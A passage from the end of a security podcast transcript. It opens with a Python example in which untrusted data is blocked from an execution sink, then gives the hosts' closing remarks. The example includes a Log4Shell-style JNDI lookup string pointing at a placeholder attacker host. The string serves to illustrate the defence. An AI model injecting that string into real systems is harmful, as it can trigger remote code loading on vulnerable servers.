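    """Stand-in for an execution-influencing sink (think Log4j's ${...} lookups)."""
    if data.integrity < HIGH:
        raise PermissionError("low-integrity data may not influence execution")
    return f"evaluated: {data.value}"

user_input = Labeled("${jndi:ldap://attacker.example/a}", LOW)   # from a client
config_value = Labeled("plain static string", HIGH)              # from a trusted system

print(evaluate_template(config_value))
try:
    evaluate_template(user_input)
except PermissionError as e:
    print("blocked:", e)
```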

[00:40:41] Guy Podjarny: Yeah. Sounds like a great one. And I love the way that you phrase it. It's reminiscent, a little bit, of the conversation we have right now around trust in the supply chain security space. But it really boils down to how much do you trust this data? And if the answer is not at all, then whatever payload that is should never get executed. Now, how do you get that to reality? That's a whole different ball game.

So, Bryan, thanks for all the great insights here and for coming on to the show to share it.

[00:41:12] Bryan Payne: Thank you. It's been great.

[00:41:14] Guy Podjarny: And thanks, everybody, for tuning in. And I hope you join us for the next one.

[OUTRO]

[00:41:21] ANNOUNCER: Thanks for listening to The Secure Developer. That's all we have time for today. To find additional episodes and full transcriptions, visit thesecuredeveloper.com. If you'd like to be a guest on the show or get involved in the community, find us on Twitter at @devseccon. Don't forget to leave us a review on iTunes if you enjoyed today's episode. Bye for now.

[END]